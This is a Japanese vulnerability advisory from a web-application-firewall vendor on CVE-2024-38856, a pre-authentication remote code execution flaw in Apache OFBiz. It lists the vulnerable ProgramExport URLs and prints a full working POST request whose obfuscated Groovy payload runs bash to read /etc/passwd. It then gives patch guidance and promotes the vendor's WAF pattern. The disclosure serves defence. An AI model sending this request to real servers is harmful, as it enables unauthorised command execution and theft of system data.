[2025.02 脆弱性レポート] Apache OFbiz Pre-Auth リモートコード実行 | Cloud-Based Platform AIONCLOUD

Threat Intelligence Report

Get up-to-date information on web application vulnerabilities, attacks, and how to respond.

Back to Threat Intelligence Report

[2025.02 脆弱性レポート] Apache OFbiz Pre-Auth リモートコード実行

本脆弱性は、Apache OFBiz に存在する認証前 RCE 脆弱性であり、攻撃者は、特定の URL に対するリクエストを処理する際に不正な認証プロセスを悪用することで、認証プロセスを介さずに悪意のあるコードを実行することが可能です。

この脆弱性はApache OFBizのバージョン18.12.15で修正されており、AIWAFは2228を通じて対応している: 2025年1月のパターンアップデートに追加された「Apache OFBiz Remote Code Execution」パターンで対応し、関連する脆弱性の監視を継続している。

1. 概要

Apache OFBiz はフリーでオープンソースの ERP であり、我々は最近このプラットフォームで発見された認証前 RCE 脆弱性 CVE-2024-38856 を分析しました。

image.png

出典 : https://www.helpnetsecurity.com/2024/08/05/cve-2024-38856/

2. 攻撃タイプ

CVE-2024-38856は、Apache OFBizに存在する認証前RCEの脆弱性で、特定のURLに対するリクエストを処理する際に不正な認証処理が行われるため、認証なしでリクエストが処理される可能性がある。

以前にもこの処理を利用した脆弱性CVE-2024-36104があり、パッチが適用されていたが、Sonicwallによると、本質的に機能を修正することなく、Path Traversalのチェックを追加する対応だったため、Path Traversalの構文を含まないURLを送信することで、そのパッチをバイパスすることが可能だった。

image.png

出典 : https://www.sonicwall.com/blog/sonicwall-discovers-second-critical-apache-ofbiz-zero-day-vulnerability

攻撃者は、ページビューをレンダリングするProgramExport機能を利用して、特定のURLにgroovyProgramパラメータで悪意のあるペイロードを送信します。

この攻撃では以下のURLが利用される:

  • /webtools/control/forgotPassword/ProgramExport
  • /webtools/control/main/ProgramExport
  • /webtools/control/showDateTime/ProgramExport
  • /webtools/control/view/ProgramExport
  • /webtools/control/TestService/ProgramExport

RCE 攻撃リクエスト :

POST /webtools/control/main/ProgramExport HTTP/1.1
Content-Length: 1198
Content-Type: application/x-www-form-urlencoded
Host: www.tdst.com
User-Agent: HTTPie

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u005b\u0022\u0062\u0061\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0022\u007b\u0065\u0063\u0068\u006f\u002c\u005a\u0057\u004e\u006f\u0062\u0079\u0042\u0062\u0063\u006d\u0056\u007a\u0064\u0057\u0078\u0030\u0058\u0054\u0073\u0067\u0059\u0032\u0046\u0030\u0049\u0043\u0039\u006c\u0064\u0047\u004d\u0076\u0063\u0047\u0046\u007a\u0063\u0033\u0064\u006b\u004f\u0079\u0042\u006c\u0059\u0032\u0068\u0076\u0049\u0046\u0074\u0079\u005a\u0058\u004e\u0031\u0062\u0048\u0052\u0064\u004f\u0077\u003d\u003d\u007d\u007c\u007b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u002d\u0064\u007d\u007c\u007b\u0062\u0061\u0073\u0068\u002c\u002d\u0069\u007d\u0022\u005d\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

3. 対応

Apache OFBiz は、CVE-2024-38856 に対するパッチをリリースしており、同製品のユーザーは、バージョン 18.12.15 以降にパッチを適用して対応してください。弊社AIWAF製品では、パターン2228で脆弱性に対応しています: Apache OFBiz Remote Code Execution」は、2025年1月のパターンアップデートで追加されました。

4. 結論

Apache OFBizは、オープンソースであることから多くの組織で利用されている強力なオープンソースERPであり、本脆弱性は、CVSSスコア9.8でCISAカテゴリに追加された影響力の大きい危険な脆弱性であることが確認されており、早急に最新版へのパッチ適用が必要です。

当社のAIWAF製品は、Apache OFBizの脆弱性への対応パターンを構築しており、今後も関連する脆弱性が発見された場合には、迅速に対応してまいります。

5. 参考文献

Copyright 2025 AIONCLOUD's All Right Reserved| Privacy Policy| Terms of Use| Cookie Settings
Scroll Up